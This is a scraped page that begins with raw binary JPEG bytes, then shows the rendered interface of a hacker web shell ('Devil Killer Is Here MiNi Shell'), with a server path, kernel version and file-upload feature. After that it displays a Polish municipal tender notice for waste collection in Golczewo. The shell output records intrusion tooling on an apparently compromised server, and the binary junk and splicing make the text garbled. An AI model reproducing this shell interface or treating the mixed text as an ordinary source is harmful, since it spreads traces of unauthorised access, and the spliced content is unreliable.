JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20200116/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20200116/500106-N-2020.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 500106-N-2020 z dnia 2020-01-16 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Gmina Golczewo</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Odbiór i transport odpadów komunalnych z terenu gminy Golczewo od właścicieli nieruchomości zamieszkałych i niezamieszkałych</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Usługi</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej – mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Gmina Golczewo</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">81168487000000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">Zwycięstwa</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">23</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">72-410</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Golczewo</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">zachodniopomorskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">91 3860127, 3860102, </span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">a.lisiczko@golczewo.pl, </span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">91 3860127</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">WWW.BIP.GOLCZEWO.PL</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia">www.bip.golczewo.pl</span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Administracja samorządowa</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">www.bip.golczewo.pl</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">www.bip.golczewo.pl</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">forma pisemna do siedziby Zamawiającego</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">ul. Zwycięstwa 23, 72-410 Golczewo</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Odbiór i transport odpadów komunalnych z terenu gminy Golczewo od właścicieli nieruchomości zamieszkałych i niezamieszkałych</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">ZZF.271.1.2020</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Usługi</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Nie</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski"></span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">1. Przedmiotem zamówienia jest:1) świadczenie usług na terenie gminy Golczewo w okresie od dnia 01.03.2020 r. do dnia 28.02.2021 r. w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości zamieszkałych i niezamieszkałych oraz powstających na nieruchomościach, na których znajdują się domki letniskowe lub na nieruchomościach wykorzystywanych na cele rekreacyjno-wypoczynkowe, wykorzystywanych jedynie przez część roku oraz transportu zebranych odpadów do Regionalnego Zakładu Gospodarowania Odpadami w Słajsinie, a także odbieranie selektywnie zebranych odpadów komunalnych gromadzonych w pojemnikach typu PDS-KT ustawionych w 21 lokalizacjach na terenie Gminy Golczewo;2) wyposażenie nieruchomości w wymagane ilości worków oraz pojemników na odpady komunalne;3) odbiór odpadów z Punktu Selektywnej Zbiórki Odpadów Komunalnych (PSZOK) w Golczewie oraz ich transport do Regionalnego Zakładu Gospodarowania Odpadami w Słajsinie zgodnie z obowiązującymi przepisami prawa krajowego oraz prawa miejscowego;4) zabezpieczenie i umożliwienie mieszkańcom Gminy Golczewo odpłatnego wynajęcia lub zakupu pojemników na odpady komunalne, odpowiadających postanowieniom regulaminu utrzymania czystości i porządku w Gminie Golczewo;5) odbiór i transport odpadów z koszy ulicznych znajdujących się przy przystankach autobusowych, na ulicach miasta Golczewo jak również odpadów zgromadzonych obok wymienionych pojemników;6) odbiór i transport odpadów zmieszanych i selektywnie zebranych po zgłoszeniu z miejsc wskazanych przez Zamawiającego;7) utrzymanie czystości wokół obsługiwanych pojemników.2. Wykonawca przed podpisaniem umowy przekazuje Zamawiającemu harmonogram roczny odbioru odpadów z podziałem na tereny:1) obszar w granicach administracyjnych miasta Golczewa, obejmujący :a) nieruchomości jednorodzinne,b) nieruchomości spółdzielni mieszkaniowych oraz wspólnot mieszkaniowych,2) pozostały obszar gminy Golczewo.3. Uzupełniony o daty odbioru harmonogram Zamawiający publikuje na swojej stronie oraz udostępnia mieszkańcom. Na harmonogramie powinny znajdować się oznaczenia rodzaju odbieranych odpadów przypisanych do konkretnej daty odbioru. Odbiór odpadów powinienstr. 3odbywać się w dni robocze, zawsze w te same dni tygodnia (np. pierwszy poniedziałek miesiąca itp.). Jeżeli planowany odbiór nie jest możliwy danego dnia (np. przypada w dzień wolny od pracy) Wykonawca ustala odbiór odpadów na dzień roboczy następny lub dzień przed dniem planowanego odbioru.4. Charakterystyka Gminy1) gmina miejsko – wiejska;2) powierzchnia terenu Gminy wynosi 175,39 km23) gminę tworzy miasto Golczewo oraz obszar wiejski (28 miejscowości);4) liczbę mieszkańców poszczególnych miejscowości Gminy Golczewo przedstawiono w załączniku nr 7 do SIWZ;5) liczba ustawionych w miejscach publicznie dostępnych pojemników typu PDS-KT do selektywnej zbiórki odpadów – 21 kompletów złożonych z trzech pojemników do segregacji odpadów:a) papier i tektura;b) szkło;c) tworzywa sztuczne, metale i opakowania wielomateriałowe.Wykaz pojemników z podaniem miejscowości, których są ustawione zawiera załącznik nr 9 do SIWZ.5. Charakterystyka ilościowa gospodarki odpadami komunalnymi na terenie Gminy Golczewo.Ilość odebranych odpadów komunalnych w 2018 r. i 2019 r., ze wskazaniem ilości odebranych odpadów w poszczególnych miesiącach przedstawia załącznik nr 1 do SIWZ.6. Realizując transport odebranych odpadów komunalnych z terenu gminy Golczewo podmiot odbierający odpady zobowiązany jest do przekazania odebranych odpadów do Regionalnego Zakładu Gospodarowania Odpadami w Słajsinie. Zakres przedmiotu zamówienia obejmuje również transport odebranych odpadów do instalacji odzysku i unieszkodliwiania odpadów lub do regionalnych instalacji do przetwarzania odpadów komunalnych bądź instalacji zastępczych.7. Rodzaje odbieranych odpadów komunalnych oraz częstotliwość ich odbierania:1) ustala się następujące częstotliwości pozbywania się odpadów komunalnych z terenu nieruchomości zamieszkałych w zabudowie jednorodzinnej:a) odpadów komunalnych niesegregowanych (zmieszanych) - co najmniej 1 raz na 2 tygodnie;b) bioodpadów - co najmniej 1 raz na 2 tygodnie;c) szkła - co najmniej 1 raz na miesiąc;d) papieru i tektury - co najmniej 1 raz na miesiąc;e) tworzyw sztucznych, metali, opakowań wielomateriałowych - co najmniej 2 razy na miesiąc.;2) ustala się następujące częstotliwości pozbywania się odpadów komunalnych z terenu nieruchomości zamieszkałych z budynków wielolokalowych:a) odpadów komunalnych niesegregowanych (zmieszanych) - co najmniej 1 raz tydzień;b) bioodpadów - co najmniej 1 raz tydzień, w okresie od kwietnia do października. W pozostałym okresie nie rzadziej niż raz na dwa tygodnie;c) szkła - co najmniej 1 raz dwa tygodnie;d) papieru i tektury - co najmniej 1 raz na dwa tygodnie;e) tworzyw sztucznych, metali, opakowań wielomateriałowych - co najmniej 1 raz tydzień.3) ustala się następujące częstotliwości pozbywania się odpadów komunalnych z terenu nieruchomości niezamieszkałych:a) odpadów komunalnych niesegregowanych (zmieszanych) - co najmniej 1 raz na 2 tygodnie;b) biodpadów - co najmniej 1 raz na 2 tygodnie;c) szkła - co najmniej 1 raz na miesiąc;str. 4d) papieru i tektury - co najmniej 1 raz na miesiąc;e) tworzyw sztucznych, metali, opakowań wielomateriałowych - co najmniej 2 razy na miesiąc;4) ustala się następujące częstotliwości pozbywania się odpadów komunalnych segregowanych, gromadzonych w pojemnikach gminnych typu PDS-KT:a) tworzyw sztucznych, metali, opakowań wielomateriałowych - co najmniej 2 razy w miesiącu (w okresie od 01.05.2020 r. do 30.09.2020 r.) i co najmniej raz w miesiącu w pozostałym okresie;b) szkła - co najmniej 1 raz na miesiąc;c) papieru i tektury - co najmniej 1 raz na miesiąc.8. Zamawiający zastrzega sobie możliwość zmiany częstotliwości odbierania odpadów komunalnych przez Wykonawcę (wynikającą z konieczność dostosowania gospodarki odpadami komunalnymi do potrzeb utrzymania czystości i porządku na terenie gminy Golczewo).9. Zamawiający określa jednocześnie, iż podane w ust. 7 częstotliwości odbierania poszczególnych odpadów komunalnych nie zwiększą się więcej niż dwukrotnie w całym okresie trwania umowy, z zastrzeżeniem, że zmiana częstotliwości odbierania odpadów komunalnych musi być zgodna z obowiązującym Regulaminem utrzymania czystości i porządku na terenie gminy Golczewo.10. Wykonawca wyraża gotowość do zmiany częstotliwości odbioru odpadów komunalnych z uwzględnieniem powyższych wymogów Zamawiającego.11. Zmiana częstotliwości odbioru odpadów komunalnych nie będzie stanowić zmiany umowy w sprawie zamówienia publicznego.12. Właściciele nieruchomości zobowiązani są umożliwić przedsiębiorcy dostęp do pojemników w dniu odbierania odpadów komunalnych z tych nieruchomości (wg określonego harmonogramu odbioru), przy wejściu na nieruchomość od strony ulicy, z możliwością wejścia na teren nieruchomości lub poprzez wystawienie pojemnika przed nieruchomością, w miejscu umożliwiającym swobodny dojazd do nich, z tym że:1) wystawione pojemniki nie mogą być zlokalizowane poza terenem nieruchomości dłużej niż 12 godzin przed i po terminie odbioru odpadów określonym w harmonogramie odbioru;2) wystawione pojemniki nie mogą powodować ograniczeń komunikacyjnych.13. Wykonawca zobowiązany jest odstawić opróżniony pojemnik na odpady w miejsce ustawienia go przez właściciela nieruchomości.14. Odbieranie odpadów odbywać się będzie zgodnie z podanym do ogólnej wiadomości harmonogramem odbioru odpadów komunalnych. W przypadku gdy termin wskazany w harmonogramie będzie przypadał na dzień ustawowo wolny od pracy, termin odbioru może ulec przesunięciu o dzień przed lub dzień po terminie wskazanym w harmonogramie.15. Zamawiający przekaże Wykonawcy wykaz adresów nieruchomości objętych odbiorem odpadów komunalnych oraz niezbędnych informacji do prowadzenia ewidencji oraz kontroli odbieranych odpadów komunalnych od właścicieli nieruchomości wynikających z zebranych deklaracji o wysokości opłaty za gospodarowanie odpadami komunalnymi.16. Wykonawca w porozumieniu z Zamawiającym określi terminy oraz godziny funkcjonowania przedsiębiorstwa w zakresie odbierania odpadów komunalnych.17. Częstotliwość organizowania objazdowych zbiórek komunalnych odpadów problemowych:1) dla gminy Golczewo zakłada się odbieranie komunalnych odpadów problemowych w systemie objazdowym z następującą częstotliwością dwóch zbiórek objazdowych rocznie;2) zbiórka objazdowa organizowana będzie na podstawie zgłoszeń mieszkańców Gminy (mailowo lub telefonicznie) do Urzędu Miejskiego;3) Wykonawca organizował będzie zbiórki objazdowe na podstawie ustalonegostr. 5z Zamawiającym harmonogramu (określającego terminy planowanych zbiórek w poszczególnych miejscowościach Gminy) oraz na podstawie przekazanych przez Zamawiającego danych i informacji uzyskanych ze zgłoszeń telefonicznych.4) Wykonawca zobowiązany jest prowadzić ewidencję przyjmowanych komunalnych odpadów problemowych zawierającą:a) imię i nazwisko osoby dostarczającej odpady;b) imię i nazwisko właściciela nieruchomości, z której pochodzą odpady;c) adres nieruchomości, z której pochodzą odpady;d) rodzaj i ilość oddawanych odpadów.18. Rodzaje odbieranych oraz częstotliwość odbierania odpadów komunalnych z Punktu Selektywnego Zbierania Odpadów komunalnych (PSZOK):1) PSZOK na terenie Gminy Golczewo znajduje się przy ulicy Krótkiej 4 w Golczewie (teren oczyszczalni ścieków);2) odbiór odpadów komunalnych gromadzonych w PSZOK będzie odbywał się z częstotliwością dopasowaną do potrzeb oraz na zgłoszenie Zamawiającego;3) zakłada się, że funkcjonujący PSZOK będzie wyłącznie elementem wspomagającym system zbiórki komunalnych odpadów problemowych;4) w PSZOK-u będą odbierane następujące rodzaje odpadów: tworzywa sztuczne, metale, opakowania wielomateriałowe, szkło, papier i tektura, bioodpady, odpady niebezpieczne, przeterminowane leki i chemikalia, odpady niekwalifikujące się do odpadów medycznych powstałych w gospodarstwach domowych w wyniku przyjmowania produktów leczniczych w formie iniekcji i prowadzenia monitoringu poziomu substancji we krwi, w szczególności igieł i strzykawek, zużytych baterii i akumulatorów, zużytego sprzętu elektrycznego i elektronicznego, mebli i innych odpadów wielkogabarytowych, zużytych opon, odpadów budowlanych i rozbiórkowych oraz odpadów tekstyliów i odzieży.19. W zakresie utrzymania odpowiedniego stanu sanitarnego pojazdów i urządzeń Wykonawca zapewnia:1) zabezpieczanie pojazdów i urządzeń przed niekontrolowanym wydostawaniem się na zewnątrz odpadów, podczas ich magazynowania, przeładunku oraz transportu;2) poddawanie myciu i dezynfekcji pojazdów i urządzeń, w tym także pojemników typu PDS-KT, których właścicielem jest Zamawiający z częstotliwością gwarantującą zapewnienie im właściwego stanu sanitarnego, nie rzadziej niż raz na miesiąc, a w okresie letnim nie rzadziej niż raz na 2 tygodnie;3) posiadanie aktualnych dokumentów potwierdzających wykonanie czynności mycia i dezynfekcji;4) opróżnianie pojazdów z odpadów na koniec każdego dnia roboczego oraz parkowanie ich wyłącznie na terenie bazy magazynowo – transportowej Wykonawcy.21. Obowiązki prowadzenia przez Wykonawcę dokumentacji związanej z działalnością objętą zamówieniem:1) Prowadzenie kontroli nieruchomości objętych przedmiotem zamówienia w zakresie wywiązywania się z obowiązków wynikających z Regulaminu utrzymania czystości i porządku na terenie gminy Golczewo;2) w przypadku niedopełniania przez właściciela nieruchomości obowiązku w zakresie selektywnego zbierania odpadów komunalnych Wykonawca odbiera odpady komunalne jako zmieszane odpady komunalne i powiadamia o tym Zamawiającego drogą elektroniczną. Następnie Wykonawca przedstawia wykaz tych nieruchomości, szczegółowy zakres naruszenia oraz zdjęcie odbieranych odpadów w formacie cyfrowym zawierające datę istr. 6godzinę zdarzenia. W przypadku nie dochowania obowiązku selektywnej zbiórki przez właściciela nieruchomości Wykonawca jest zobowiązany także do skutecznego powiadomienia danego właściciela;3) prowadzenie ilościowej i jakościowej ewidencji odpadów oraz prowadzenia sprawozdawczości zgodnie z przepisami obowiązującego prawa;4) Prowadzenie dodatkowej comiesięcznej sprawozdawczości i przekazywanie Zamawiającemu (do 10. dnia miesiąca następującego po miesiącu, którego dotyczy sprawozdanie) danych i informacji (w wersji papierowej lub elektronicznej na ustalonym z Zamawiającym nośniku danych oraz w 